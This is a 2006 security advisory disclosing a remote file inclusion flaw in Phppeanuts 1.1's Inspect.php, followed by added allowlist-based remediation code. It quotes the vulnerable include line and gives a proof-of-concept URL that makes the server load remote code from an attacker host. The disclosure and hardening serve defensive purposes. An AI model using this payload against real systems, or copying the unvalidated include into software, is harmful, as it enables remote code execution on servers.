From: Hidayat Sagita <hidayat.sagita_(at)_gmail.com>
Date: 14.11.2006
Subject: Phppeanuts 1.1 Remote File Include

.:: Preface ::.

Type     : Remote File Include
Scripts     : Phppeanuts 1.1
Download : http://scripts.ringsworld.com/development-tools/phppeanuts-1-1.zip
Founder  : Hidayat Sagita aka bomm_3x
Contact  : hidayat.sagita[at]gmail[dot]com

.:: What ? ::.

In the Inspect.php file, on lines 4 and 5:

4. if ( isSet($_REQUEST["Include"]) )
5.     include $_REQUEST["Include"];

The "Include" request variable is not validated before it is passed to include.
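
One way to harden the include shown above (an added example, not part of the original advisory and not Phppeanuts code): the request value only selects an entry from a fixed allowlist and is never used as a path. The INSPECT_DIR constant, the resolveInclude() helper and the file names in $allowed are hypothetical.

```php
<?php
// Added example: allowlist-based replacement for `include $_REQUEST["Include"];`.
// INSPECT_DIR and the file names in $allowed are hypothetical placeholders.

define('INSPECT_DIR', __DIR__ . '/inspectable');

/**
 * Map a caller-supplied key to a local file path, or return null.
 * The request value is never used as a path; it only selects an entry.
 */
function resolveInclude($requested, array $allowed, $baseDir)
{
    // Rejects unknown keys, array input (Include[]=...), URLs and paths alike.
    if (!is_string($requested) || !isset($allowed[$requested])) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $allowed[$requested]);
    if ($base === false || $path === false) {
        return null; // base directory or target file does not exist
    }
    // Defence in depth: the resolved path must stay inside the base directory
    // (catches symlinks or a mistaken allowlist entry).
    if (strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Keys are what the client may send; values are fixed local file names.
$allowed = array(
    'testcase' => 'TestCase.php',
    'report'   => 'Report.php',
);

if (isset($_REQUEST['Include'])) {
    $path = resolveInclude($_REQUEST['Include'], $allowed, INSPECT_DIR);
    if ($path === null) {
        header('HTTP/1.1 400 Bad Request');
        exit('Invalid Include value');
    }
    include $path;
}
```

Setting allow_url_include to Off (available from PHP 5.2.0) stops include from fetching remote URLs, but the unvalidated parameter could still name local files, so the allowlist is still needed.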

.:: Proof Of Concept ::.

http://site/[phppeanuts_path]/pntUnit/Inspect.php?Include=http://yoursite/evil_code.txt ?

.:: Shoutz ::.

eCHo staff, az001 and All newbz.
